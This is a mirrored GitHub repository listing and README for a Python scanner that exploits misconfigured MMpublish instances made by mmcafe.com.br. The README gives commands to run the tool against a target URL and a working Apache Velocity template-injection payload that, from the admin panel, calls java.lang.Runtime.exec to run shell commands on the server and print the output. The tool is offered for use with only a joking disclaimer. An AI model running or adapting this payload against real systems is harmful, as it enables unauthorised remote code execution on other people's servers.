https://github.com/incogbyte/mmpublish-scanner

Exploit miss configured mmpublish instances from "mmcafe.com.br"
https://github.com/incogbyte/mmpublish-scanner

Last synced: 9 months ago
JSON representation

Exploit miss configured mmpublish instances from "mmcafe.com.br"

• Host: GitHub
• URL: https://github.com/incogbyte/mmpublish-scanner
• Owner: incogbyte
• Created: 2020-07-20T13:27:22.000Z (almost 6 years ago)
• Default Branch: master
• Last Pushed: 2023-07-25T18:12:56.000Z (almost 3 years ago)
• Last Synced: 2025-02-02T13:36:50.375Z (over 1 year ago)
• Language: Python
• Size: 705 KB
• Stars: 1
• Watchers: 1
• Forks: 0
• Open Issues: 2
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# Description

This tool exploits misconfigured instances of MMpublish a tool made by mmcafe.com.br

Use this tool for legal propose only :P.

# Requirements

```

python3 >= python3.8

```

# Install

```

pip3 install requirements.txt

```

# Usage

```

python3 main.py -u https://target.com.br

```

![img02.png](img02.png)

# If you got access to admin panel use the Velocity payload

```

#set($x='')##

#set($rt = $x.class.forName('java.lang.Runtime'))##

#set($chr = $x.class.forName('java.lang.Character'))##

#set($str = $x.class.forName('java.lang.String'))##

#set($ex=$rt.getRuntime().exec('whoami'))##

$ex.waitFor()

#set($out=$ex.getInputStream())##

#foreach( $i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

```